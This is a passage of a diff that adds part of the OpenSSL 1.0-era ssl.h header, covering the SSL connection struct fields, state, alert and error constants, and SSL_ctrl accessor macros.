+    int server;
+    /*
+     * Generate a new session or reuse an old one.
+     * NB: For servers, the 'new' session may actually be a previously
+     * cached session or even the previous session unless
+     * SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION is set
+     */
+    int new_session;
+    /* don't send shutdown packets */
+    int quiet_shutdown;
+    /* we have shut things down, 0x01 sent, 0x02 for received */
+    int shutdown;
+    /* where we are */
+    int state;
+    /* where we are when reading */
+    int rstate;
+    BUF_MEM *init_buf;          /* buffer used during init */
+    void *init_msg;             /* pointer to handshake message body, set by
+                                 * ssl3_get_message() */
+    int init_num;               /* amount read/written */
+    int init_off;               /* amount read/written */
+    /* used internally to point at a raw packet */
+    unsigned char *packet;
+    unsigned int packet_length;
+    struct ssl2_state_st *s2;   /* SSLv2 variables */
+    struct ssl3_state_st *s3;   /* SSLv3 variables */
+    struct dtls1_state_st *d1;  /* DTLSv1 variables */
+    int read_ahead;             /* Read as many input bytes as possible (for
+                                 * non-blocking reads) */
+    /* callback that allows applications to peek at protocol messages */
+    void (*msg_callback) (int write_p, int version, int content_type,
+                          const void *buf, size_t len, SSL *ssl, void *arg);
+    void *msg_callback_arg;
+    int hit;                    /* reusing a previous session */
+    X509_VERIFY_PARAM *param;
+#  if 0
+    int purpose;                /* Purpose setting */
+    int trust;                  /* Trust setting */
+#  endif
+    /* crypto */
+    STACK_OF(SSL_CIPHER) *cipher_list;
+    STACK_OF(SSL_CIPHER) *cipher_list_by_id;
+    /*
+     * These are the ones being used, the ones in SSL_SESSION are the ones to
+     * be 'copied' into these ones
+     */
+    int mac_flags;
+    EVP_CIPHER_CTX *enc_read_ctx; /* cryptographic state */
+    EVP_MD_CTX *read_hash;      /* used for mac generation */
+#  ifndef OPENSSL_NO_COMP
+    COMP_CTX *expand;           /* uncompress */
+#  else
+    char *expand;
+#  endif
+    EVP_CIPHER_CTX *enc_write_ctx; /* cryptographic state */
+    EVP_MD_CTX *write_hash;     /* used for mac generation */
+#  ifndef OPENSSL_NO_COMP
+    COMP_CTX *compress;         /* compression */
+#  else
+    char *compress;
+#  endif
+    /* session info */
+    /* client cert? */
+    /* This is used to hold the server certificate used */
+    struct cert_st /* CERT */ *cert;
+    /*
+     * the session_id_context is used to ensure sessions are only reused in
+     * the appropriate context
+     */
+    unsigned int sid_ctx_length;
+    unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
+    /* This can also be in the session once a session is established */
+    SSL_SESSION *session;
+    /* Default generate session ID callback. */
+    GEN_SESSION_CB generate_session_id;
+    /* Used in SSL2 and SSL3 */
+    /*
+     * 0 don't care about verify failure.
+     * 1 fail if verify fails
+     */
+    int verify_mode;
+    /* fail if callback returns 0 */
+    int (*verify_callback) (int ok, X509_STORE_CTX *ctx);
+    /* optional informational callback */
+    void (*info_callback) (const SSL *ssl, int type, int val);
+    /* error bytes to be written */
+    int error;
+    /* actual code */
+    int error_code;
+#  ifndef OPENSSL_NO_KRB5
+    /* Kerberos 5 context */
+    KSSL_CTX *kssl_ctx;
+#  endif                        /* OPENSSL_NO_KRB5 */
+#  ifndef OPENSSL_NO_PSK
+    unsigned int (*psk_client_callback) (SSL *ssl, const char *hint,
+                                         char *identity,
+                                         unsigned int max_identity_len,
+                                         unsigned char *psk,
+                                         unsigned int max_psk_len);
+    unsigned int (*psk_server_callback) (SSL *ssl, const char *identity,
+                                         unsigned char *psk,
+                                         unsigned int max_psk_len);
+#  endif
+    SSL_CTX *ctx;
+    /*
+     * set this flag to 1 and a sleep(1) is put into all SSL_read() and
+     * SSL_write() calls, good for nbio debuging :-)
+     */
+    int debug;
+    /* extra application data */
+    long verify_result;
+    CRYPTO_EX_DATA ex_data;
+    /* for server side, keep the list of CA_dn we can use */
+    STACK_OF(X509_NAME) *client_CA;
+    int references;
+    /* protocol behaviour */
+    unsigned long options;
+    /* API behaviour */
+    unsigned long mode;
+    long max_cert_list;
+    int first_packet;
+    /* what was passed, used for SSLv3/TLS rollback check */
+    int client_version;
+    unsigned int max_send_fragment;
+#  ifndef OPENSSL_NO_TLSEXT
+    /* TLS extension debug callback */
+    void (*tlsext_debug_cb) (SSL *s, int client_server, int type,
+                             unsigned char *data, int len, void *arg);
+    void *tlsext_debug_arg;
+    char *tlsext_hostname;
+    /*-
+     * no further mod of servername
+     * 0 : call the servername extension callback.
+     * 1 : prepare 2, allow last ack just after in server callback.
+     * 2 : don't call servername callback, no ack in server hello
+     */
+    int servername_done;
+    /* certificate status request info */
+    /* Status type or -1 if no status type */
+    int tlsext_status_type;
+    /* Expect OCSP CertificateStatus message */
+    int tlsext_status_expected;
+    /* OCSP status request only */
+    STACK_OF(OCSP_RESPID) *tlsext_ocsp_ids;
+    X509_EXTENSIONS *tlsext_ocsp_exts;
+    /* OCSP response received or to be sent */
+    unsigned char *tlsext_ocsp_resp;
+    int tlsext_ocsp_resplen;
+    /* RFC4507 session ticket expected to be received or sent */
+    int tlsext_ticket_expected;
+#   ifndef OPENSSL_NO_EC
+    size_t tlsext_ecpointformatlist_length;
+    /* our list */
+    unsigned char *tlsext_ecpointformatlist;
+    size_t tlsext_ellipticcurvelist_length;
+    /* our list */
+    unsigned char *tlsext_ellipticcurvelist;
+#   endif                       /* OPENSSL_NO_EC */
+    /*
+     * draft-rescorla-tls-opaque-prf-input-00.txt information to be used for
+     * handshakes
+     */
+    void *tlsext_opaque_prf_input;
+    size_t tlsext_opaque_prf_input_len;
+    /* TLS Session Ticket extension override */
+    TLS_SESSION_TICKET_EXT *tlsext_session_ticket;
+    /* TLS Session Ticket extension callback */
+    tls_session_ticket_ext_cb_fn tls_session_ticket_ext_cb;
+    void *tls_session_ticket_ext_cb_arg;
+    /* TLS pre-shared secret session resumption */
+    tls_session_secret_cb_fn tls_session_secret_cb;
+    void *tls_session_secret_cb_arg;
+    SSL_CTX *initial_ctx;       /* initial ctx, used to store sessions */
+#   ifndef OPENSSL_NO_NEXTPROTONEG
+    /*
+     * Next protocol negotiation. For the client, this is the protocol that
+     * we sent in NextProtocol and is set when handling ServerHello
+     * extensions. For a server, this is the client's selected_protocol from
+     * NextProtocol and is set when handling the NextProtocol message, before
+     * the Finished message.
+     */
+    unsigned char *next_proto_negotiated;
+    unsigned char next_proto_negotiated_len;
+#   endif
+#   define session_ctx initial_ctx
+    /* What we'll do */
+    STACK_OF(SRTP_PROTECTION_PROFILE) *srtp_profiles;
+    /* What's been chosen */
+    SRTP_PROTECTION_PROFILE *srtp_profile;
+        /*-
+         * Is use of the Heartbeat extension negotiated?
+         * 0: disabled
+         * 1: enabled
+         * 2: enabled, but not allowed to send Requests
+         */
+    unsigned int tlsext_heartbeat;
+    /* Indicates if a HeartbeatRequest is in flight */
+    unsigned int tlsext_hb_pending;
+    /* HeartbeatRequest sequence number */
+    unsigned int tlsext_hb_seq;
+#  else
+#   define session_ctx ctx
+#  endif                        /* OPENSSL_NO_TLSEXT */
+    /*-
+     * 1 if we are renegotiating.
+     * 2 if we are a server and are inside a handshake
+     * (i.e. not just sending a HelloRequest)
+     */
+    int renegotiate;
+#  ifndef OPENSSL_NO_SRP
+    /* ctx for SRP authentication */
+    SRP_CTX srp_ctx;
+#  endif
+#  ifndef OPENSSL_NO_TLSEXT
+    /*
+     * For a client, this contains the list of supported protocols in wire
+     * format.
+     */
+    unsigned char *alpn_client_proto_list;
+    unsigned alpn_client_proto_list_len;
+#  endif                        /* OPENSSL_NO_TLSEXT */
+};
+
+# endif
+
+#ifdef __cplusplus
+}
+#endif
+
+# include <openssl/ssl2.h>
+# include <openssl/ssl3.h>
+# include <openssl/tls1.h>      /* This is mostly sslv3 with a few tweaks */
+# include <openssl/dtls1.h>     /* Datagram TLS */
+# include <openssl/ssl23.h>
+# include <openssl/srtp.h>      /* Support for the use_srtp extension */
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* compatibility */
+# define SSL_set_app_data(s,arg)         (SSL_set_ex_data(s,0,(char *)arg))
+# define SSL_get_app_data(s)             (SSL_get_ex_data(s,0))
+# define SSL_SESSION_set_app_data(s,a)   (SSL_SESSION_set_ex_data(s,0,(char *)a))
+# define SSL_SESSION_get_app_data(s)     (SSL_SESSION_get_ex_data(s,0))
+# define SSL_CTX_get_app_data(ctx)       (SSL_CTX_get_ex_data(ctx,0))
+# define SSL_CTX_set_app_data(ctx,arg)   (SSL_CTX_set_ex_data(ctx,0,(char *)arg))
+
+/*
+ * The following are the possible values for ssl->state are are used to
+ * indicate where we are up to in the SSL connection establishment. The
+ * macros that follow are about the only things you should need to use and
+ * even then, only when using non-blocking IO. It can also be useful to work
+ * out where you were when the connection failed
+ */
+
+# define SSL_ST_CONNECT                  0x1000
+# define SSL_ST_ACCEPT                   0x2000
+# define SSL_ST_MASK                     0x0FFF
+# define SSL_ST_INIT                     (SSL_ST_CONNECT|SSL_ST_ACCEPT)
+# define SSL_ST_BEFORE                   0x4000
+# define SSL_ST_OK                       0x03
+# define SSL_ST_RENEGOTIATE              (0x04|SSL_ST_INIT)
+
+# define SSL_CB_LOOP                     0x01
+# define SSL_CB_EXIT                     0x02
+# define SSL_CB_READ                     0x04
+# define SSL_CB_WRITE                    0x08
+# define SSL_CB_ALERT                    0x4000/* used in callback */
+# define SSL_CB_READ_ALERT               (SSL_CB_ALERT|SSL_CB_READ)
+# define SSL_CB_WRITE_ALERT              (SSL_CB_ALERT|SSL_CB_WRITE)
+# define SSL_CB_ACCEPT_LOOP              (SSL_ST_ACCEPT|SSL_CB_LOOP)
+# define SSL_CB_ACCEPT_EXIT              (SSL_ST_ACCEPT|SSL_CB_EXIT)
+# define SSL_CB_CONNECT_LOOP             (SSL_ST_CONNECT|SSL_CB_LOOP)
+# define SSL_CB_CONNECT_EXIT             (SSL_ST_CONNECT|SSL_CB_EXIT)
+# define SSL_CB_HANDSHAKE_START          0x10
+# define SSL_CB_HANDSHAKE_DONE           0x20
+
+/* Is the SSL_connection established? */
+# define SSL_get_state(a)                SSL_state(a)
+# define SSL_is_init_finished(a)         (SSL_state(a) == SSL_ST_OK)
+# define SSL_in_init(a)                  (SSL_state(a)&SSL_ST_INIT)
+# define SSL_in_before(a)                (SSL_state(a)&SSL_ST_BEFORE)
+# define SSL_in_connect_init(a)          (SSL_state(a)&SSL_ST_CONNECT)
+# define SSL_in_accept_init(a)           (SSL_state(a)&SSL_ST_ACCEPT)
+
+/*
+ * The following 2 states are kept in ssl->rstate when reads fail, you should
+ * not need these
+ */
+# define SSL_ST_READ_HEADER                      0xF0
+# define SSL_ST_READ_BODY                        0xF1
+# define SSL_ST_READ_DONE                        0xF2
+
+/*-
+ * Obtain latest Finished message
+ *   -- that we sent (SSL_get_finished)
+ *   -- that we expected from peer (SSL_get_peer_finished).
+ * Returns length (0 == no Finished so far), copies up to 'count' bytes.
+ */
+size_t SSL_get_finished(const SSL *s, void *buf, size_t count);
+size_t SSL_get_peer_finished(const SSL *s, void *buf, size_t count);
+
+/*
+ * use either SSL_VERIFY_NONE or SSL_VERIFY_PEER, the last 2 options are
+ * 'ored' with SSL_VERIFY_PEER if they are desired
+ */
+# define SSL_VERIFY_NONE                 0x00
+# define SSL_VERIFY_PEER                 0x01
+# define SSL_VERIFY_FAIL_IF_NO_PEER_CERT 0x02
+# define SSL_VERIFY_CLIENT_ONCE          0x04
+
+# define OpenSSL_add_ssl_algorithms()    SSL_library_init()
+# define SSLeay_add_ssl_algorithms()     SSL_library_init()
+
+/* this is for backward compatibility */
+# if 0                          /* NEW_SSLEAY */
+#  define SSL_CTX_set_default_verify(a,b,c) SSL_CTX_set_verify(a,b,c)
+#  define SSL_set_pref_cipher(c,n)        SSL_set_cipher_list(c,n)
+#  define SSL_add_session(a,b)            SSL_CTX_add_session((a),(b))
+#  define SSL_remove_session(a,b)         SSL_CTX_remove_session((a),(b))
+#  define SSL_flush_sessions(a,b)         SSL_CTX_flush_sessions((a),(b))
+# endif
+/* More backward compatibility */
+# define SSL_get_cipher(s) \
+                SSL_CIPHER_get_name(SSL_get_current_cipher(s))
+# define SSL_get_cipher_bits(s,np) \
+                SSL_CIPHER_get_bits(SSL_get_current_cipher(s),np)
+# define SSL_get_cipher_version(s) \
+                SSL_CIPHER_get_version(SSL_get_current_cipher(s))
+# define SSL_get_cipher_name(s) \
+                SSL_CIPHER_get_name(SSL_get_current_cipher(s))
+# define SSL_get_time(a)         SSL_SESSION_get_time(a)
+# define SSL_set_time(a,b)       SSL_SESSION_set_time((a),(b))
+# define SSL_get_timeout(a)      SSL_SESSION_get_timeout(a)
+# define SSL_set_timeout(a,b)    SSL_SESSION_set_timeout((a),(b))
+
+# define d2i_SSL_SESSION_bio(bp,s_id) ASN1_d2i_bio_of(SSL_SESSION,SSL_SESSION_new,d2i_SSL_SESSION,bp,s_id)
+# define i2d_SSL_SESSION_bio(bp,s_id) ASN1_i2d_bio_of(SSL_SESSION,i2d_SSL_SESSION,bp,s_id)
+
+DECLARE_PEM_rw(SSL_SESSION, SSL_SESSION)
+# define SSL_AD_REASON_OFFSET            1000/* offset to get SSL_R_... value
+                                              * from SSL_AD_... */
+/* These alert types are for SSLv3 and TLSv1 */
+# define SSL_AD_CLOSE_NOTIFY             SSL3_AD_CLOSE_NOTIFY
+/* fatal */
+# define SSL_AD_UNEXPECTED_MESSAGE       SSL3_AD_UNEXPECTED_MESSAGE
+/* fatal */
+# define SSL_AD_BAD_RECORD_MAC           SSL3_AD_BAD_RECORD_MAC
+# define SSL_AD_DECRYPTION_FAILED        TLS1_AD_DECRYPTION_FAILED
+# define SSL_AD_RECORD_OVERFLOW          TLS1_AD_RECORD_OVERFLOW
+/* fatal */
+# define SSL_AD_DECOMPRESSION_FAILURE    SSL3_AD_DECOMPRESSION_FAILURE
+/* fatal */
+# define SSL_AD_HANDSHAKE_FAILURE        SSL3_AD_HANDSHAKE_FAILURE
+/* Not for TLS */
+# define SSL_AD_NO_CERTIFICATE           SSL3_AD_NO_CERTIFICATE
+# define SSL_AD_BAD_CERTIFICATE          SSL3_AD_BAD_CERTIFICATE
+# define SSL_AD_UNSUPPORTED_CERTIFICATE  SSL3_AD_UNSUPPORTED_CERTIFICATE
+# define SSL_AD_CERTIFICATE_REVOKED      SSL3_AD_CERTIFICATE_REVOKED
+# define SSL_AD_CERTIFICATE_EXPIRED      SSL3_AD_CERTIFICATE_EXPIRED
+# define SSL_AD_CERTIFICATE_UNKNOWN      SSL3_AD_CERTIFICATE_UNKNOWN
+/* fatal */
+# define SSL_AD_ILLEGAL_PARAMETER        SSL3_AD_ILLEGAL_PARAMETER
+/* fatal */
+# define SSL_AD_UNKNOWN_CA               TLS1_AD_UNKNOWN_CA
+/* fatal */
+# define SSL_AD_ACCESS_DENIED            TLS1_AD_ACCESS_DENIED
+/* fatal */
+# define SSL_AD_DECODE_ERROR             TLS1_AD_DECODE_ERROR
+# define SSL_AD_DECRYPT_ERROR            TLS1_AD_DECRYPT_ERROR
+/* fatal */
+# define SSL_AD_EXPORT_RESTRICTION       TLS1_AD_EXPORT_RESTRICTION
+/* fatal */
+# define SSL_AD_PROTOCOL_VERSION         TLS1_AD_PROTOCOL_VERSION
+/* fatal */
+# define SSL_AD_INSUFFICIENT_SECURITY    TLS1_AD_INSUFFICIENT_SECURITY
+/* fatal */
+# define SSL_AD_INTERNAL_ERROR           TLS1_AD_INTERNAL_ERROR
+# define SSL_AD_USER_CANCELLED           TLS1_AD_USER_CANCELLED
+# define SSL_AD_NO_RENEGOTIATION         TLS1_AD_NO_RENEGOTIATION
+# define SSL_AD_UNSUPPORTED_EXTENSION    TLS1_AD_UNSUPPORTED_EXTENSION
+# define SSL_AD_CERTIFICATE_UNOBTAINABLE TLS1_AD_CERTIFICATE_UNOBTAINABLE
+# define SSL_AD_UNRECOGNIZED_NAME        TLS1_AD_UNRECOGNIZED_NAME
+# define SSL_AD_BAD_CERTIFICATE_STATUS_RESPONSE TLS1_AD_BAD_CERTIFICATE_STATUS_RESPONSE
+# define SSL_AD_BAD_CERTIFICATE_HASH_VALUE TLS1_AD_BAD_CERTIFICATE_HASH_VALUE
+/* fatal */
+# define SSL_AD_UNKNOWN_PSK_IDENTITY     TLS1_AD_UNKNOWN_PSK_IDENTITY
+/* fatal */
+# define SSL_AD_INAPPROPRIATE_FALLBACK   TLS1_AD_INAPPROPRIATE_FALLBACK
+# define SSL_ERROR_NONE                  0
+# define SSL_ERROR_SSL                   1
+# define SSL_ERROR_WANT_READ             2
+# define SSL_ERROR_WANT_WRITE            3
+# define SSL_ERROR_WANT_X509_LOOKUP      4
+# define SSL_ERROR_SYSCALL               5/* look at error stack/return
+                                           * value/errno */
+# define SSL_ERROR_ZERO_RETURN           6
+# define SSL_ERROR_WANT_CONNECT          7
+# define SSL_ERROR_WANT_ACCEPT           8
+# define SSL_CTRL_NEED_TMP_RSA                   1
+# define SSL_CTRL_SET_TMP_RSA                    2
+# define SSL_CTRL_SET_TMP_DH                     3
+# define SSL_CTRL_SET_TMP_ECDH                   4
+# define SSL_CTRL_SET_TMP_RSA_CB                 5
+# define SSL_CTRL_SET_TMP_DH_CB                  6
+# define SSL_CTRL_SET_TMP_ECDH_CB                7
+# define SSL_CTRL_GET_SESSION_REUSED             8
+# define SSL_CTRL_GET_CLIENT_CERT_REQUEST        9
+# define SSL_CTRL_GET_NUM_RENEGOTIATIONS         10
+# define SSL_CTRL_CLEAR_NUM_RENEGOTIATIONS       11
+# define SSL_CTRL_GET_TOTAL_RENEGOTIATIONS       12
+# define SSL_CTRL_GET_FLAGS                      13
+# define SSL_CTRL_EXTRA_CHAIN_CERT               14
+# define SSL_CTRL_SET_MSG_CALLBACK               15
+# define SSL_CTRL_SET_MSG_CALLBACK_ARG           16
+/* only applies to datagram connections */
+# define SSL_CTRL_SET_MTU                17
+/* Stats */
+# define SSL_CTRL_SESS_NUMBER                    20
+# define SSL_CTRL_SESS_CONNECT                   21
+# define SSL_CTRL_SESS_CONNECT_GOOD              22
+# define SSL_CTRL_SESS_CONNECT_RENEGOTIATE       23
+# define SSL_CTRL_SESS_ACCEPT                    24
+# define SSL_CTRL_SESS_ACCEPT_GOOD               25
+# define SSL_CTRL_SESS_ACCEPT_RENEGOTIATE        26
+# define SSL_CTRL_SESS_HIT                       27
+# define SSL_CTRL_SESS_CB_HIT                    28
+# define SSL_CTRL_SESS_MISSES                    29
+# define SSL_CTRL_SESS_TIMEOUTS                  30
+# define SSL_CTRL_SESS_CACHE_FULL                31
+# define SSL_CTRL_OPTIONS                        32
+# define SSL_CTRL_MODE                           33
+# define SSL_CTRL_GET_READ_AHEAD                 40
+# define SSL_CTRL_SET_READ_AHEAD                 41
+# define SSL_CTRL_SET_SESS_CACHE_SIZE            42
+# define SSL_CTRL_GET_SESS_CACHE_SIZE            43
+# define SSL_CTRL_SET_SESS_CACHE_MODE            44
+# define SSL_CTRL_GET_SESS_CACHE_MODE            45
+# define SSL_CTRL_GET_MAX_CERT_LIST              50
+# define SSL_CTRL_SET_MAX_CERT_LIST              51
+# define SSL_CTRL_SET_MAX_SEND_FRAGMENT          52
+/* see tls1.h for macros based on these */
+# ifndef OPENSSL_NO_TLSEXT
+#  define SSL_CTRL_SET_TLSEXT_SERVERNAME_CB       53
+#  define SSL_CTRL_SET_TLSEXT_SERVERNAME_ARG      54
+#  define SSL_CTRL_SET_TLSEXT_HOSTNAME            55
+#  define SSL_CTRL_SET_TLSEXT_DEBUG_CB            56
+#  define SSL_CTRL_SET_TLSEXT_DEBUG_ARG           57
+#  define SSL_CTRL_GET_TLSEXT_TICKET_KEYS         58
+#  define SSL_CTRL_SET_TLSEXT_TICKET_KEYS         59
+#  define SSL_CTRL_SET_TLSEXT_OPAQUE_PRF_INPUT    60
+#  define SSL_CTRL_SET_TLSEXT_OPAQUE_PRF_INPUT_CB 61
+#  define SSL_CTRL_SET_TLSEXT_OPAQUE_PRF_INPUT_CB_ARG 62
+#  define SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB       63
+#  define SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB_ARG   64
+#  define SSL_CTRL_SET_TLSEXT_STATUS_REQ_TYPE     65
+#  define SSL_CTRL_GET_TLSEXT_STATUS_REQ_EXTS     66
+#  define SSL_CTRL_SET_TLSEXT_STATUS_REQ_EXTS     67
+#  define SSL_CTRL_GET_TLSEXT_STATUS_REQ_IDS      68
+#  define SSL_CTRL_SET_TLSEXT_STATUS_REQ_IDS      69
+#  define SSL_CTRL_GET_TLSEXT_STATUS_REQ_OCSP_RESP        70
+#  define SSL_CTRL_SET_TLSEXT_STATUS_REQ_OCSP_RESP        71
+#  define SSL_CTRL_SET_TLSEXT_TICKET_KEY_CB       72
+#  define SSL_CTRL_SET_TLS_EXT_SRP_USERNAME_CB    75
+#  define SSL_CTRL_SET_SRP_VERIFY_PARAM_CB                76
+#  define SSL_CTRL_SET_SRP_GIVE_CLIENT_PWD_CB             77
+#  define SSL_CTRL_SET_SRP_ARG            78
+#  define SSL_CTRL_SET_TLS_EXT_SRP_USERNAME               79
+#  define SSL_CTRL_SET_TLS_EXT_SRP_STRENGTH               80
+#  define SSL_CTRL_SET_TLS_EXT_SRP_PASSWORD               81
+#  ifndef OPENSSL_NO_HEARTBEATS
+#   define SSL_CTRL_TLS_EXT_SEND_HEARTBEAT                         85
+#   define SSL_CTRL_GET_TLS_EXT_HEARTBEAT_PENDING          86
+#   define SSL_CTRL_SET_TLS_EXT_HEARTBEAT_NO_REQUESTS      87
+#  endif
+# endif                         /* OPENSSL_NO_TLSEXT */
+# define DTLS_CTRL_GET_TIMEOUT           73
+# define DTLS_CTRL_HANDLE_TIMEOUT        74
+# define DTLS_CTRL_LISTEN                        75
+# define SSL_CTRL_GET_RI_SUPPORT                 76
+# define SSL_CTRL_CLEAR_OPTIONS                  77
+# define SSL_CTRL_CLEAR_MODE                     78
+# define SSL_CTRL_GET_EXTRA_CHAIN_CERTS          82
+# define SSL_CTRL_CLEAR_EXTRA_CHAIN_CERTS        83
+# define SSL_CTRL_CHAIN                          88
+# define SSL_CTRL_CHAIN_CERT                     89
+# define SSL_CTRL_GET_CURVES                     90
+# define SSL_CTRL_SET_CURVES                     91
+# define SSL_CTRL_SET_CURVES_LIST                92
+# define SSL_CTRL_GET_SHARED_CURVE               93
+# define SSL_CTRL_SET_ECDH_AUTO                  94
+# define SSL_CTRL_SET_SIGALGS                    97
+# define SSL_CTRL_SET_SIGALGS_LIST               98
+# define SSL_CTRL_CERT_FLAGS                     99
+# define SSL_CTRL_CLEAR_CERT_FLAGS               100
+# define SSL_CTRL_SET_CLIENT_SIGALGS             101
+# define SSL_CTRL_SET_CLIENT_SIGALGS_LIST        102
+# define SSL_CTRL_GET_CLIENT_CERT_TYPES          103
+# define SSL_CTRL_SET_CLIENT_CERT_TYPES          104
+# define SSL_CTRL_BUILD_CERT_CHAIN               105
+# define SSL_CTRL_SET_VERIFY_CERT_STORE          106
+# define SSL_CTRL_SET_CHAIN_CERT_STORE           107
+# define SSL_CTRL_GET_PEER_SIGNATURE_NID         108
+# define SSL_CTRL_GET_SERVER_TMP_KEY             109
+# define SSL_CTRL_GET_RAW_CIPHERLIST             110
+# define SSL_CTRL_GET_EC_POINT_FORMATS           111
+# define SSL_CTRL_GET_CHAIN_CERTS                115
+# define SSL_CTRL_SELECT_CURRENT_CERT            116
+# define SSL_CTRL_SET_CURRENT_CERT               117
+# define SSL_CTRL_CHECK_PROTO_VERSION            119
+# define DTLS_CTRL_SET_LINK_MTU                  120
+# define DTLS_CTRL_GET_LINK_MIN_MTU              121
+# define SSL_CERT_SET_FIRST                      1
+# define SSL_CERT_SET_NEXT                       2
+# define SSL_CERT_SET_SERVER                     3
+# define DTLSv1_get_timeout(ssl, arg) \
+        SSL_ctrl(ssl,DTLS_CTRL_GET_TIMEOUT,0, (void *)arg)
+# define DTLSv1_handle_timeout(ssl) \
+        SSL_ctrl(ssl,DTLS_CTRL_HANDLE_TIMEOUT,0, NULL)
+# define DTLSv1_listen(ssl, peer) \
+        SSL_ctrl(ssl,DTLS_CTRL_LISTEN,0, (void *)peer)
+# define SSL_session_reused(ssl) \
+        SSL_ctrl((ssl),SSL_CTRL_GET_SESSION_REUSED,0,NULL)
+# define SSL_num_renegotiations(ssl) \
+        SSL_ctrl((ssl),SSL_CTRL_GET_NUM_RENEGOTIATIONS,0,NULL)
+# define SSL_clear_num_renegotiations(ssl) \
+        SSL_ctrl((ssl),SSL_CTRL_CLEAR_NUM_RENEGOTIATIONS,0,NULL)
+# define SSL_total_renegotiations(ssl) \
+        SSL_ctrl((ssl),SSL_CTRL_GET_TOTAL_RENEGOTIATIONS,0,NULL)
+# define SSL_CTX_need_tmp_RSA(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_NEED_TMP_RSA,0,NULL)
+# define SSL_CTX_set_tmp_rsa(ctx,rsa) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TMP_RSA,0,(char *)rsa)
+# define SSL_CTX_set_tmp_dh(ctx,dh) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TMP_DH,0,(char *)dh)
+# define SSL_CTX_set_tmp_ecdh(ctx,ecdh) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TMP_ECDH,0,(char *)ecdh)
+# define SSL_need_tmp_RSA(ssl) \
+        SSL_ctrl(ssl,SSL_CTRL_NEED_TMP_RSA,0,NULL)
+# define SSL_set_tmp_rsa(ssl,rsa) \
+        SSL_ctrl(ssl,SSL_CTRL_SET_TMP_RSA,0,(char *)rsa)
+# define SSL_set_tmp_dh(ssl,dh) \
+        SSL_ctrl(ssl,SSL_CTRL_SET_TMP_DH,0,(char *)dh)
+# define SSL_set_tmp_ecdh(ssl,ecdh) \
+        SSL_ctrl(ssl,SSL_CTRL_SET_TMP_ECDH,0,(char *)ecdh)
+# define SSL_CTX_add_extra_chain_cert(ctx,x509) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_EXTRA_CHAIN_CERT,0,(char *)x509)
+# define SSL_CTX_get_extra_chain_certs(ctx,px509) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_GET_EXTRA_CHAIN_CERTS,0,px509)
+# define SSL_CTX_get_extra_chain_certs_only(ctx,px509) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_GET_EXTRA_CHAIN_CERTS,1,px509)
+# define SSL_CTX_clear_extra_chain_certs(ctx) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_CLEAR_EXTRA_CHAIN_CERTS,0,NULL)
+# define SSL_CTX_set0_chain(ctx,sk) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_CHAIN,0,(char *)sk)
+# define SSL_CTX_set1_chain(ctx,sk) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_CHAIN,1,(char *)sk)
+# define SSL_CTX_add0_chain_cert(ctx,x509) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_CHAIN_CERT,0,(char *)x509)
+# define SSL_CTX_add1_chain_cert(ctx,x509) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_CHAIN_CERT,1,(char *)x509)
+# define SSL_CTX_get0_chain_certs(ctx,px509) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_GET_CHAIN_CERTS,0,px509)
+# define SSL_CTX_clear_chain_certs(ctx) \
+        SSL_CTX_set0_chain(ctx,NULL)
+# define SSL_CTX_build_cert_chain(ctx, flags) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_BUILD_CERT_CHAIN, flags, NULL)
+# define SSL_CTX_select_current_cert(ctx,x509) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SELECT_CURRENT_CERT,0,(char *)x509)
+# define SSL_CTX_set_current_cert(ctx, op) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_CURRENT_CERT, op, NULL)
+# define SSL_CTX_set0_verify_cert_store(ctx,st) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_VERIFY_CERT_STORE,0,(char *)st)
+# define SSL_CTX_set1_verify_cert_store(ctx,st) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_VERIFY_CERT_STORE,1,(char *)st)
+# define SSL_CTX_set0_chain_cert_store(ctx,st) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_CHAIN_CERT_STORE,0,(char *)st)
+# define SSL_CTX_set1_chain_cert_store(ctx,st) \
+        SSL_CTX_ctrl(ctx,SSL_CTRL_SET_CHAIN_CERT_STORE,1,(char *)st)
+# define SSL_set0_chain(ctx,sk) \
+        SSL_ctrl(ctx,SSL_CTRL_CHAIN,0,(char *)sk)
+# define SSL_set1_chain(ctx,sk) \
+        SSL_ctrl(ctx,SSL_CTRL_CHAIN,1,(char *)sk)
+# define SSL_add0_chain_cert(ctx,x509) \
+        SSL_ctrl(ctx,SSL_CTRL_CHAIN_CERT,0,(char *)x509)
+# define SSL_add1_chain_cert(ctx,x509) \
+        SSL_ctrl(ctx,SSL_CTRL_CHAIN_CERT,1,(char *)x509)
+# define SSL_get0_chain_certs(ctx,px509) \
+        SSL_ctrl(ctx,SSL_CTRL_GET_CHAIN_CERTS,0,px509)
+# define SSL_clear_chain_certs(ctx) \
+        SSL_set0_chain(ctx,NULL)
+# define SSL_build_cert_chain(s, flags) \
+        SSL_ctrl(s,SSL_CTRL_BUILD_CERT_CHAIN, flags, NULL)
+# define SSL_select_current_cert(ctx,x509) \
+        SSL_ctrl(ctx,SSL_CTRL_SELECT_CURRENT_CERT,0,(char *)x509)
+# define SSL_set_current_cert(ctx,op) \
+        SSL_ctrl(ctx,SSL_CTRL_SET_CURRENT_CERT, op, NULL)
+# define SSL_set0_verify_cert_store(s,st) \
+        SSL_ctrl(s,SSL_CTRL_SET_VERIFY_CERT_STORE,0,(char *)st)
